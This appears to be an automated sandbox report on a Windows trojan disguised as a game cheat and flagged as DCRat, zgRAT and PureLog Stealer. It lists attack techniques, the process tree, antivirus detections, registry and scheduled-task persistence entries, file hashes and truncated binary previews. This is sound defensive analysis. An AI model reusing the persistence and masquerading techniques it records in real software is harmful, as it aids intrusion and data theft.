Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation (11); Command and Scripting Interpreter (2); Scheduled Task/Job (1); Exploitation for Client Execution (1); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: Scheduled Task/Job (1); Scripting (11); Registry Run Keys / Startup Folder (21); DLL Side-Loading (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Process Injection (11); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (21); DLL Side-Loading (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Masquerading (133); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (31); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (3); DLL Side-Loading (1); File Deletion (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (1); Security Software Discovery (121); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); File and Directory Discovery (3); System Information Discovery (37); System Owner/User Discovery; Network Sniffing
Lateral Movement: Taint Shared Content (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Encrypted Channel (1); Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph ID: 1590012 | Sample: SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Startdate: 13/01/2025 | Architecture: WINDOWS | Score: 100

Start
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for dropped file; 14 other signatures
  Started processes:
    SAMP_CHEAT_ATVECHAU2.exe.bin.exe (3 6)
      Dropped: C:\...\BridgePortsurrogateserverref.exe, PE32
      Started: wscript.exe (1)
        Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
        Started: cmd.exe (1)
          Started: BridgePortsurrogateserverref.exe (7 35); conhost.exe
            BridgePortsurrogateserverref.exe (7 35)
              Dropped: C:\msportComWin\jnowHpJlZlXal.exe, PE32; C:\Users\user\Desktop\vyXTwjuX.log, PE32; C:\Users\user\Desktop\fSPDjruA.log, PE32; 10 other malicious files
              Signatures: Multi AV Scanner detection for dropped file; Creates an undocumented autostart registry key; Creates multiple autostart registry keys; 4 other signatures
              Started: csc.exe (4); csc.exe; powershell.exe; 21 other processes
                csc.exe (4)
                  Dropped: C:\Program Files (x86)\...\msedge.exe, PE32
                  Signatures: Infects executable files (exe, dll, sys, html)
                  Started: conhost.exe; cvtres.exe (1)
                csc.exe
                  Dropped: C:\Windows\...\SecurityHealthSystray.exe, PE32
                  Started: conhost.exe; cvtres.exe
                powershell.exe
                  Signatures: Loading BitLocker PowerShell Module
                  Started: conhost.exe
                21 other processes
                  Started: conhost.exe; conhost.exe; conhost.exe; 17 other processes
    services.exe
      Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
    jnowHpJlZlXal.exe (2)
    4 other processes

Source | Detection | Scanner | Label | Link
SAMP_CHEAT_ATVECHAU2.exe.bin.exe | 56% | Virustotal | | Browse
SAMP_CHEAT_ATVECHAU2.exe.bin.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
SAMP_CHEAT_ATVECHAU2.exe.bin.exe | 100% | Avira | VBS/Runner.VPG |
SAMP_CHEAT_ATVECHAU2.exe.bin.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\8SIf5KWJtt.bat | 100% | Avira | BAT/Delbat.C |
C:\Recovery\services.exe | 100% | Avira | TR/Spy.Agent.dcvxq |
C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe | 100% | Avira | TR/Spy.Agent.dcvxq |
C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe | 100% | Avira | TR/Spy.Agent.dcvxq |
C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe | 100% | Avira | TR/Spy.Agent.dcvxq |
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | 100% | Joe Sandbox ML | |
C:\Recovery\services.exe | 100% | Joe Sandbox ML | |
C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe | 100% | Joe Sandbox ML | |
C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe | 100% | Joe Sandbox ML | |
C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe | 100% | Joe Sandbox ML | |
C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe | 55% | Virustotal | | Browse
C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe | 55% | Virustotal | | Browse
C:\Recovery\jnowHpJlZlXal.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Recovery\jnowHpJlZlXal.exe | 55% | Virustotal | | Browse
C:\Recovery\services.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\EcfIfcKE.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\MGoyPVal.log | 29% | ReversingLabs | Win32.Trojan.Generic |
C:\Users\user\Desktop\VjwnzPpT.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\VrgGeyQY.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\fSPDjruA.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\vyXTwjuX.log | 8% | ReversingLabs | |
C:\msportComWin\BridgePortsurrogateserverref.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\msportComWin\jnowHpJlZlXal.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    No Antivirus matches
                                    No Antivirus matches
                                    No Antivirus matches
                                    No contacted domains info
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://aka.ms/pscore68powershell.exe, 00000026.00000002.1783465174.000002563FE41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.1753750292.000001D880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1733402114.000001A6833C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.1763302374.0000016F928D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1691776577.000002BF80601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1770576287.00000146B2CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.1705344630.000001B980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1697699277.0000014B28EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.1733069605.000001B3C4C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1735567184.000001EDD75A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.1761913793.000001DCE6BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1703359712.000001FE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.1806998001.000001FA1EA61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1757555101.0000024914A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.1729234879.000001E34F331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1770411015.000001E1DB6A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.1770629189.0000016FBB1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.1763311905.000001FFB76D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 
00000047.00000002.1817958201.00000298B7C11000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000047.00000002.1817958201.00000298B7E37000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000026.00000002.1783465174.00000256401EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.1753750292.000001D880226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1733402114.000001A6836BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.1763302374.0000016F92AF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1691776577.000002BF80827000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1770576287.00000146B2EF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.1705344630.000001B980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1697699277.0000014B290E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.1733069605.000001B3C4E46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1735567184.000001EDD77C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.1761913793.000001DCE6DF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1703359712.000001FE80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.1806998001.000001FA1EC88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1757555101.0000024914C98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.1729234879.000001E34F558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1770411015.000001E1DB8C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.1770629189.0000016FBB46A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.1763311905.000001FFB78F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 
00000047.00000002.1817958201.00000298B7E37000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameBridgePortsurrogateserverref.exe, 0000000A.00000002.1520293640.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1783465174.000002563FE41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.1753750292.000001D880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1733402114.000001A6833C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.1763302374.0000016F928D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1691776577.000002BF80601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1770576287.00000146B2CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.1705344630.000001B980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1697699277.0000014B28EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.1733069605.000001B3C4C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1735567184.000001EDD75A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.1761913793.000001DCE6BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1703359712.000001FE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.1806998001.000001FA1EA61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1757555101.0000024914A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.1729234879.000001E34F331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1770411015.000001E1DB6A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.1770629189.0000016FBB1D1000.00000004.00000800.00020000.00000000.sdmp, 
powershell.exe, 00000045.00000002.1763311905.000001FFB76D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000047.00000002.1817958201.00000298B7C11000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000047.00000002.1817958201.00000298B7E37000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000047.00000002.1817958201.00000298B7E37000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000026.00000002.1783465174.00000256401EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.1753750292.000001D880226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1733402114.000001A6836BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.1763302374.0000016F92AF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1691776577.000002BF80827000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1770576287.00000146B2EF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.1705344630.000001B980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1697699277.0000014B290E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.1733069605.000001B3C4E46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1735567184.000001EDD77C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.1761913793.000001DCE6DF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1703359712.000001FE80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.1806998001.000001FA1EC88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1757555101.0000024914C98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.1729234879.000001E34F558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1770411015.000001E1DB8C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.1770629189.0000016FBB46A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.1763311905.000001FFB78F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 
00000047.00000002.1817958201.00000298B7E37000.00000004.00000800.00020000.00000000.sdmp | false | - | high
No contacted IP infos
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1590012
Start date and time: 2025-01-13 13:30:18 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 41s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 91
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: SAMP_CHEAT_ATVECHAU2.exe.bin.exe
Detection: MAL
Classification: mal100.spre.troj.expl.evad.winEXE@90/113@0/0
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 59%
• Number of executed functions: 216
• Number of non-executed functions: 95
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, schtasks.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
• Excluded domains from analysis (whitelisted): 77777cm.nyashtyan.in, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target BridgePortsurrogateserverref.exe, PID 4340 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
07:31:36 | API Interceptor | 398x Sleep call for process: powershell.exe modified
13:31:27 | Task Scheduler | Run new task: jnowHpJlZlXal path: "C:\msportComWin\jnowHpJlZlXal.exe"
13:31:27 | Task Scheduler | Run new task: jnowHpJlZlXalj path: "C:\msportComWin\jnowHpJlZlXal.exe"
13:31:30 | Task Scheduler | Run new task: BridgePortsurrogateserverref path: "C:\msportComWin\BridgePortsurrogateserverref.exe"
13:31:30 | Task Scheduler | Run new task: BridgePortsurrogateserverrefB path: "C:\msportComWin\BridgePortsurrogateserverref.exe"
13:31:31 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run jnowHpJlZlXal "C:\Recovery\jnowHpJlZlXal.exe"
13:31:32 | Task Scheduler | Run new task: services path: "C:\Recovery\services.exe"
13:31:32 | Task Scheduler | Run new task: servicess path: "C:\Recovery\services.exe"
14:39:47 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run services "C:\Recovery\services.exe"
14:39:57 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BridgePortsurrogateserverref "C:\msportComWin\BridgePortsurrogateserverref.exe"
14:40:07 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run jnowHpJlZlXal "C:\Recovery\jnowHpJlZlXal.exe"
14:40:16 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run services "C:\Recovery\services.exe"
14:40:26 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BridgePortsurrogateserverref "C:\msportComWin\BridgePortsurrogateserverref.exe"
14:40:35 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run jnowHpJlZlXal "C:\Recovery\jnowHpJlZlXal.exe"
14:40:46 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run services "C:\Recovery\services.exe"
14:40:56 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run BridgePortsurrogateserverref "C:\msportComWin\BridgePortsurrogateserverref.exe"
14:41:13 | Autostart | Run: WinLogon Shell "C:\msportComWin\jnowHpJlZlXal.exe"
14:41:24 | Autostart | Run: WinLogon Shell "C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe"
14:41:33 | Autostart | Run: WinLogon Shell "C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe"
14:41:43 | Autostart | Run: WinLogon Shell "C:\Recovery\jnowHpJlZlXal.exe"
14:41:52 | Autostart | Run: WinLogon Shell "C:\Recovery\services.exe"
14:42:01 | Autostart | Run: WinLogon Shell "C:\msportComWin\BridgePortsurrogateserverref.exe"
No context
Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type: MSVC .res
Category: dropped
Size (bytes): 1168
Entropy (8bit): 4.448520842480604
Encrypted: false
SSDEEP: 24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
MD5: B5189FB271BE514BEC128E0D0809C04E
SHA1: 5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
SHA-256: E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
SHA-512: F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
Malicious: false
                                                  Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 4608
Entropy (8bit): 3.8939066343544275
Encrypted: false
SSDEEP: 48:6GmFtAjxZ8RxeOAkFJOcV4MKe28dJVlPvqBHPuulB+hnqXSfbNtm:sdxvxVx9JPvkhTkZzNt
MD5: 27B7A73F4796647204D3C14329356141
SHA1: 4E7C4017E05D3716416A0617A22D15178C210102
SHA-256: C8B30CC0958094A9247498AB9C14BAF3474A80C125440ADB2C840B5C62898C2C
SHA-512: 3F94548ADDC1FE659791809EB5AA6B917B7BCC88ACFC44CBB3964105F648C685821F6B6006D1A9C97D32B56D5CEC41A952448B507C978624CEF4ED25A5CB27B3
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.............................'... ...@....@.. ....................................@.................................<'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p'......H.......(!................................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................

Process: C:\msportComWin\BridgePortsurrogateserverref.exe
File Type: ASCII text, with very long lines (879), with no line terminators
Category: dropped
Size (bytes): 879
Entropy (8bit): 5.9072825012408146
Encrypted: false
SSDEEP: 12:5JIvtDDAc1x36D3oc4rSlMbHqRsyc0zf0dNs+VwwWhQ28ttnQzsSeUhxS/s+mTya:glfH1RIKJZy7gU+mBj8tRJFUhxccTyQN
MD5: D3136DA42C71FA40F6ECDEFE381FA3A4
SHA1: 69396FD8A82F8443D799EB4DD811B9CC16BB8306
SHA-256: 6A308FDE8AEE5B4FDB7FC260FC87C0FEA60C3CDD528EE4A69A155EF349732E0D
SHA-512: 81BAA4BB271C68E93D2D30CD8E81008983F2F871232A2C14859F67306E22A43E197EAEFAE76A815CABC82A4782877C85A55964A074B4127979FE34E7E6B86FA7
Malicious: false
                                                  Preview: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

Process: C:\msportComWin\BridgePortsurrogateserverref.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 2002944
Entropy (8bit): 7.567943716522346
Encrypted: false
SSDEEP: 24576:CEmEVLqBMwOk+ADUZjmwMUuTEZ/iJJjhs4P/r+iHtxItZPFtOObxoD24TKf9jUW:1Z+qwOZFM+aJJbL+iNuuMxoyW29
MD5: 5F80A11E82CC7495CF5AD7DF3D052721
SHA1: 3A20EB31195A97CF5DA7D3C20C1B8C4913B95A13
SHA-256: 851AA5F3636700F9BB71A4C0D040255F19871BA306F87D9F66B39F3B207EC15B
SHA-512: 7ACDD2A4F5170212BEABEBA86DCB7A6BE74C4C83815DB3BB328D6541F6A259EC3C6FF469F103EB125163371F103AE3060404E1C34622F2D4D9CB34D2CC7B3C0D
Malicious: true
Yara Hits:
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 83%
• Antivirus: Virustotal, Detection: 55%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s..g................................ ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text....... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................t...}............................................0..........(.... ........8........E....*...9.......)...8%...(.... ....~....{}...:....& ....8....*(.... ....8....(.... ....~....{m...9....& ....8........0.......... ........8........E....................y.......8....~....:.... ....~....{....:....& ....8....~....((... .... .... ....s....~....(,....... ....~....{....9u...& ....8j......... ....8Z.......~....(0...~....(4... ....<2... ........8&...8*... ....~.

Process: C:\msportComWin\BridgePortsurrogateserverref.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 184
Entropy (8bit): 5.749484972738549
Encrypted: false
SSDEEP: 3:AUGeTJqEqEdQSG3wUx98TF0W3kM2udyI3hKnaQoVNOjyQVTuhiof0y:AUGW/dQso80MyI3on0zsyIuhdfL
MD5: 412A1A5359955F2301EC31B6194E2558
SHA1: 36CF7969B1F42E3B9F303D1E21964572DA0715E6
SHA-256: 97ADCB71924919CE2D9E063DA4C7433F58F54F6181C03A7024A9277240D3B7E1
SHA-512: 94B8810F3F5644029D15B5E709D7284707EDE29B103808AE24FBB16F0C0367FA84DBE95579C2AF24A4CE5565C044EE9976499787FE336DF4A94C90C8CB075184
Malicious: false
Preview: PPmPsSNENkoufZBGeavwE62AwA6zg84AOu0QIKShaxreg4SDYCqLqnGSXmdrWXiOpofviv7UHOVRPYd1r2aeRsTkoi3frlKCOcy2YhfmEWDcSzC8JlAe7E76U5HA2bmgDSCxkkcJXyZ5p1Syf4WFkqFKf1idaetmthY9xPYiJ0GIpBRcmSe8Fh5W

Process: C:\msportComWin\BridgePortsurrogateserverref.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 2002944
Entropy (8bit): 7.567943716522346
Encrypted: false
SSDEEP: 24576:CEmEVLqBMwOk+ADUZjmwMUuTEZ/iJJjhs4P/r+iHtxItZPFtOObxoD24TKf9jUW:1Z+qwOZFM+aJJbL+iNuuMxoyW29
MD5: 5F80A11E82CC7495CF5AD7DF3D052721
SHA1: 3A20EB31195A97CF5DA7D3C20C1B8C4913B95A13
SHA-256: 851AA5F3636700F9BB71A4C0D040255F19871BA306F87D9F66B39F3B207EC15B
SHA-512: 7ACDD2A4F5170212BEABEBA86DCB7A6BE74C4C83815DB3BB328D6541F6A259EC3C6FF469F103EB125163371F103AE3060404E1C34622F2D4D9CB34D2CC7B3C0D
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 83%
• Antivirus: Virustotal, Detection: 55%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s..g................................ ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text....... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................t...}............................................0..........(.... ........8........E....*...9.......)...8%...(.... ....~....{}...:....& ....8....*(.... ....8....(.... ....~....{m...9....& ....8........0.......... ........8........E....................y.......8....~....:.... ....~....{....:....& ....8....~....((... .... .... ....s....~....(,....... ....~....{....9u...& ....8j......... ....8Z.......~....(0...~....(4... ....<2... ........8&...8*... ....~.

Process: C:\msportComWin\BridgePortsurrogateserverref.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 151
Entropy (8bit): 5.590568524630907
Encrypted: false
SSDEEP: 3:Nqi9pMP2icrfQ1I6ipJivQEvAA93O2hLLXIeJQxkc82C/Gn:NqiVmHK+YA9rhIeJ//2C/Gn
MD5: D8920B6BA6E0450DB193B8C3BAC4F454
SHA1: B030E0E175BD125907E78095C28D4CB67AB160BB
SHA-256: 2AC2F0EF8EC7B893F04B5366D2B7E427DB6EF00B942261F1A339DEA74F148740
